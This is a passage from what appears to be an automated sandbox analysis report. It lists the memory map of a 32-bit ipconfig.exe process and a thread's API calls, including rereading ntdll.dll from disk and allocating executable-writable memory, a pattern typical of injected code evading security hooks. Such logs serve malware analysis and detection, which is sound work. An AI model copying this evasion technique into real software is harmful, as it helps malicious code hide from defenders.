0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10508 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 10509 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 10510 start_va = 0x190000 end_va = 0x1cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 10511 start_va = 0x220000 end_va = 0x25ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 10512 start_va = 0x680000 end_va = 0x689fff monitored = 1 entry_point = 0x681f47 region_type = mapped_file name = "ipconfig.exe" filename = "\\Windows\\SysWOW64\\ipconfig.exe" (normalized: "c:\\windows\\syswow64\\ipconfig.exe") Region: id = 10513 start_va = 0x77630000 end_va = 0x777d8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10514 start_va = 0x77810000 end_va = 0x7798ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 10515 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 10516 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 10517 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 10518 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 10519 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 10520 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10521 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 10535 start_va = 0x70000 end_va = 0x98fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 10537 start_va = 0x680000 end_va = 0x689fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000680000" filename = "" Region: id = 10538 start_va = 0x300000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 10539 start_va = 0x73f30000 end_va = 0x73f37fff monitored = 0 entry_point = 0x73f320f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 10540 start_va = 0x73f40000 end_va = 0x73f9bfff monitored = 0 entry_point = 0x73f7f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 10541 start_va = 0x73fa0000 end_va = 0x73fdefff monitored = 0 entry_point = 0x73fce088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 10542 start_va = 0x77510000 end_va = 0x7762efff monitored = 0 entry_point = 0x77525340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10543 start_va = 0x754f0000 end_va = 0x755fffff monitored = 0 entry_point = 0x75503283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 10544 start_va = 0x77510000 end_va = 0x7762efff monitored = 0 entry_point = 0x77525340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10545 start_va = 0x77510000 end_va = 0x7762efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000077510000" filename = "" Region: id = 10546 start_va = 0x77410000 end_va = 0x77509fff monitored = 0 entry_point = 0x7742a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 10547 start_va = 0x77410000 end_va = 0x77509fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000077410000" filename = "" Region: id = 10548 start_va = 0x380000 end_va = 0x51ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 10549 start_va = 0x754f0000 end_va = 0x755fffff monitored = 0 entry_point = 0x75503283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 10550 start_va = 0x76ab0000 end_va = 0x76af6fff monitored = 0 entry_point = 0x76ab74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 10551 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10552 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 10553 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 10554 start_va = 0xa0000 end_va = 0x106fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10555 start_va = 0x765e0000 end_va = 0x7667ffff monitored = 0 entry_point = 0x765f49e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 10556 start_va = 0x76530000 end_va = 0x765dbfff monitored = 0 entry_point = 0x7653a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 10557 start_va = 0x772f0000 end_va = 0x77308fff monitored = 0 entry_point = 0x772f4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 10558 start_va = 0x75600000 end_va = 0x756effff monitored = 0 entry_point = 0x75610569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 10559 start_va = 0x75360000 end_va = 0x753bffff monitored = 0 entry_point = 0x7537a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 10560 start_va = 0x75350000 end_va = 0x7535bfff monitored = 0 entry_point = 0x753510e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 10561 start_va = 0x74420000 end_va = 0x74463fff monitored = 0 entry_point = 0x744363f9 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 10562 start_va = 0x77230000 end_va = 0x77264fff monitored = 0 entry_point = 0x7723145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 10563 start_va = 0x777e0000 end_va = 0x777e5fff monitored = 0 entry_point = 0x777e1782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 10564 start_va = 0x74400000 end_va = 0x7441bfff monitored = 0 entry_point = 0x7440a431 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 10565 start_va = 0x743f0000 end_va = 0x743f6fff monitored = 0 entry_point = 0x743f128d region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 10566 start_va = 0x743d0000 end_va = 0x743e1fff monitored = 0 entry_point = 0x743d3271 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc.dll") Region: id = 10567 start_va = 0x743c0000 end_va = 0x743ccfff monitored = 0 entry_point = 0x743c2012 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc6.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc6.dll") Region: id = 10568 start_va = 0x758c0000 end_va = 0x76509fff monitored = 0 entry_point = 0x75941601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 10569 start_va = 0x76f70000 end_va = 0x76fc6fff monitored = 0 entry_point = 0x76f89ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 10570 start_va = 0x771a0000 end_va = 0x7722ffff monitored = 0 entry_point = 0x771b6343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 10571 start_va = 0x76b00000 end_va = 0x76bfffff monitored = 0 entry_point = 0x76b1b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 10572 start_va = 0x76520000 end_va = 0x76529fff monitored = 0 entry_point = 0x765236a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 10573 start_va = 0x753c0000 end_va = 0x7545cfff monitored = 0 entry_point = 0x753f3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 10574 start_va = 0x75750000 end_va = 0x758abfff monitored = 0 entry_point = 0x7579ba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 10575 start_va = 0x690000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 10576 start_va = 0x110000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 10577 start_va = 0x800000 end_va = 0x987fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 10578 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 10579 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 10580 start_va = 0x76e50000 end_va = 0x76eaffff monitored = 0 entry_point = 0x76e6158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 10581 start_va = 0x769e0000 end_va = 0x76aabfff monitored = 0 entry_point = 0x769e168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 10582 start_va = 0x990000 end_va = 0xb10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000990000" filename = "" Region: id = 10583 start_va = 0xb20000 end_va = 0x1f1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b20000" filename = "" Region: id = 10584 start_va = 0x20000 end_va = 0x26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ipconfig.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\ipconfig.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\ipconfig.exe.mui") Region: id = 10585 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 10586 start_va = 0x110000 end_va = 0x110fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 10587 start_va = 0x150000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 10588 start_va = 0x520000 end_va = 0x65bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 10589 start_va = 0x1f20000 end_va = 0x20a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f20000" filename = "" Region: id = 10590 start_va = 0x20b0000 end_va = 0x23b2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020b0000" filename = "" Region: id = 10591 start_va = 0x120000 end_va = 0x12ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 10592 start_va = 0x560000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 10593 start_va = 0x5f0000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 10594 start_va = 0x690000 end_va = 0x790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 10595 start_va = 0x7f0000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007f0000" filename = "" Region: id = 10596 start_va = 0x7efd8000 end_va = 0x7efdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 10597 start_va = 0x120000 end_va = 0x148fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 10598 start_va = 0x1d0000 end_va = 0x1f8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 10599 start_va = 0x260000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 10600 start_va = 0x380000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 10601 start_va = 0x420000 end_va = 0x51ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 10602 start_va = 0x200000 end_va = 0x20ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 10603 start_va = 0x23c0000 end_va = 0x3f17fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000023c0000" filename = "" Region: id = 10604 start_va = 0x3f20000 end_va = 0x4114fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f20000" filename = "" Region: id = 10605 start_va = 0x4120000 end_va = 0x4314fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 10607 start_va = 0x520000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 10608 start_va = 0x5a0000 end_va = 0x5ccfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 10609 start_va = 0x2060000 end_va = 0x209ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002060000" filename = "" Region: id = 10610 start_va = 0x7efd5000 end_va = 0x7efd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 10611 start_va = 0x77310000 end_va = 0x77404fff monitored = 0 entry_point = 0x77311865 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 10612 start_va = 0x76fd0000 end_va = 0x77105fff monitored = 0 entry_point = 0x76fd1b35 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 10613 start_va = 0x77110000 end_va = 0x7719efff monitored = 0 entry_point = 0x77113fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 10614 start_va = 0x768b0000 end_va = 0x769d0fff monitored = 0 entry_point = 0x768b158e region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 10615 start_va = 0x76eb0000 end_va = 0x76ebbfff monitored = 0 entry_point = 0x76eb238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 10616 start_va = 0x76c00000 end_va = 0x76dfafff monitored = 0 entry_point = 0x76c022d9 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 10618 start_va = 0x1f20000 end_va = 0x202bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f20000" filename = "" Region: id = 10625 start_va = 0x200000 end_va = 0x20ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Thread: id = 109 os_tid = 0x5c4 [0270.055] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x25ed1c | out: HeapArray=0x25ed1c*=0x420000) returned 0x3 [0270.064] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SysWOW64\\ntdll.dll", NtPathName=0x25eccc, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SysWOW64\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0270.066] NtCreateFile (in: FileHandle=0x25ecec, DesiredAccess=0x120089, ObjectAttributes=0x25ecb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SysWOW64\\ntdll.dll", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x25ecd4, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x25ecec*=0xb0, IoStatusBlock=0x25ecd4*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0270.073] RtlFreeHeap (HeapHandle=0x420000, Flags=0x0, BaseAddress=0x436f50) returned 1 [0270.076] NtQueryInformationFile (in: FileHandle=0xb0, IoStatusBlock=0x25ecd4, FileInformation=0x25ec2c, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x25ecd4, FileInformation=0x25ec2c) returned 0x0 [0270.081] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x13bb40) returned 0x520020 [0270.096] NtReadFile (in: FileHandle=0xb0, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x25ecd4, Buffer=0x520020, BufferLength=0x13b740, ByteOffset=0x25ec44*=0, Key=0x0 | out: IoStatusBlock=0x25ecd4, Buffer=0x520020*) returned 0x0 [0270.115] NtClose (Handle=0xb0) returned 0x0 [0270.115] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x180001) returned 0x1f20020 [0270.124] RtlFreeHeap (HeapHandle=0x420000, Flags=0x0, BaseAddress=0x520020) returned 1 [0270.132] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x25ecc0*=0x0, ZeroBits=0x0, RegionSize=0x25ecc4*=0x302fa0, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x25ecc0*=0x20b0000, RegionSize=0x25ecc4*=0x303000) returned 0x0 [0270.159] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x1000) returned 0x436f50 [0270.159] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x1000) returned 0x437f58 [0270.160] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x1000) returned 0x438f60 [0270.160] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x2000) returned 0x439f68 [0270.160] RtlFreeHeap (HeapHandle=0x420000, Flags=0x0, BaseAddress=0x438f60) returned 1 [0270.160] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x3000) returned 0x43bf70 [0270.160] RtlFreeHeap (HeapHandle=0x420000, Flags=0x0, BaseAddress=0x439f68) returned 1 [0270.160] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x4000) returned 0x43ef78 [0270.160] RtlFreeHeap (HeapHandle=0x420000, Flags=0x0, BaseAddress=0x43bf70) returned 1 [0270.160] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x5000) returned 0x438f60 [0270.160] RtlFreeHeap (HeapHandle=0x420000, Flags=0x0, BaseAddress=0x43ef78) returned 1 [0270.160] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x1000) returned 0x43df68 [0270.161] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x2000) returned 0x43ef70 [0270.161] RtlFreeHeap (HeapHandle=0x420000, Flags=0x0, BaseAddress=0x43df68) returned 1 [0270.161] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x3000) returned 0x440f78 [0270.161] RtlFreeHeap (HeapHandle=0x420000, Flags=0x0, BaseAddress=0x43ef70) returned 1 [0270.161] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x4000) returned 0x443f80 [0270.161] RtlFreeHeap (HeapHandle=0x420000, Flags=0x0, BaseAddress=0x440f78) returned 1 [0270.161] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x5000) returned 0x43df68 [0270.161] RtlFreeHeap (HeapHandle=0x420000, Flags=0x0, BaseAddress=0x443f80) returned 1 [0270.161] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x1000) returned 0x442f70 [0270.161] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x2000) returned 0x443f78 [0270.161] RtlFreeHeap (HeapHandle=0x420000, Flags=0x0, BaseAddress=0x442f70) returned 1 [0270.161] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x3000) returned 0x445f80 [0270.161] RtlFreeHeap (HeapHandle=0x420000, Flags=0x0, BaseAddress=0x443f78) returned 1 [0270.161] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x4000) returned 0x448f88 [0270.161] RtlFreeHeap (HeapHandle=0x420000, Flags=0x0, BaseAddress=0x445f80) returned 1 [0270.162] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x5000) returned 0x442f70 [0270.162] RtlFreeHeap (HeapHandle=0x420000, Flags=0x0, BaseAddress=0x448f88) returned 1 [0270.162] RtlFreeHeap (HeapHandle=0x420000, Flags=0x0, BaseAddress=0x436f50) returned 1 [0270.162] RtlFreeHeap (HeapHandle=0x420000, Flags=0x0, BaseAddress=0x437f58) returned 1 [0270.162] RtlFreeHeap (HeapHandle=0x420000, Flags=0x0, BaseAddress=0x438f60) returned 1 [0270.162] RtlFreeHeap (HeapHandle=0x420000, Flags=0x0, BaseAddress=0x43df68) returned 1 [0270.162] RtlFreeHeap (HeapHandle=0x420000, Flags=0x0, BaseAddress=0x442f70) returned 1 [0270.170] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x1000) returned 0x436f50 [0270.170] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x1000) returned 0x437f58 [0270.170] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x1000) returned 0x438f60 [0270.170] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x2000) returned 0x439f68 [0270.170] RtlFreeHeap (HeapHandle=0x420000, Flags=0x0, BaseAddress=0x438f60) returned 1 [0270.170] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x3000) returned 0x43bf70 [0270.170] RtlFreeHeap (HeapHandle=0x420000, Flags=0x0, BaseAddress=0x439f68) returned 1 [0270.170] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x4000) returned 0x43ef78 [0270.170] RtlFreeHeap (HeapHandle=0x420000, Flags=0x0, BaseAddress=0x43bf70) returned 1 [0270.170] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x5000) returned 0x438f60 [0270.170] RtlFreeHeap (HeapHandle=0x420000, Flags=0x0, BaseAddress=0x43ef78) returned 1 [0270.170] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x1000) returned 0x43df68 [0270.170] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x2000) returned 0x43ef70 [0270.171] RtlFreeHeap (HeapHandle=0x420000, Flags=0x0, BaseAddress=0x43df68) returned 1 [0270.171] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x3000) returned 0x440f78 [0270.171] RtlFreeHeap (HeapHandle=0x420000, Flags=0x0, BaseAddress=0x43ef70) returned 1 [0270.171] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x4000) returned 0x443f80 [0270.171] RtlFreeHeap (HeapHandle=0x420000, Flags=0x0, BaseAddress=0x440f78) returned 1 [0270.171] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x5000) returned 0x43df68 [0270.171] RtlFreeHeap (HeapHandle=0x420000, Flags=0x0, BaseAddress=0x443f80) returned 1 [0270.171] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x1000) returned 0x442f70 [0270.171] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x2000) returned 0x443f78 [0270.171] RtlFreeHeap (HeapHandle=0x420000, Flags=0x0, BaseAddress=0x442f70) returned 1 [0270.171] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x3000) returned 0x445f80 [0270.171] RtlFreeHeap (HeapHandle=0x420000, Flags=0x0, BaseAddress=0x443f78) returned 1 [0270.171] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x4000) returned 0x448f88 [0270.171] RtlFreeHeap (HeapHandle=0x420000, Flags=0x0, BaseAddress=0x445f80) returned 1 [0270.171] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x5000) returned 0x442f70 [0270.171] RtlFreeHeap (HeapHandle=0x420000, Flags=0x0, BaseAddress=0x448f88) returned 1 [0270.171] RtlFreeHeap (HeapHandle=0x420000, Flags=0x0, BaseAddress=0x436f50) returned 1 [0270.171] RtlFreeHeap (HeapHandle=0x420000, Flags=0x0, BaseAddress=0x437f58) returned 1 [0270.171] RtlFreeHeap (HeapHandle=0x420000, Flags=0x0, BaseAddress=0x438f60) returned 1 [0270.171] RtlFreeHeap (HeapHandle=0x420000, Flags=0x0, BaseAddress=0x43df68) returned 1 [0270.171] RtlFreeHeap (HeapHandle=0x420000, Flags=0x0, BaseAddress=0x442f70) returned 1 [0270.171] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SysWOW64\\ntdll.dll", NtPathName=0x25ec6c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SysWOW64\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0270.172] NtCreateFile (in: FileHandle=0x25ec8c, DesiredAccess=0x120089, ObjectAttributes=0x25ec54*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SysWOW64\\ntdll.dll", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x25ec74, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x25ec8c*=0xb0, IoStatusBlock=0x25ec74*(Status=0x0, Pointer=0x0, Information=0x1)) returned 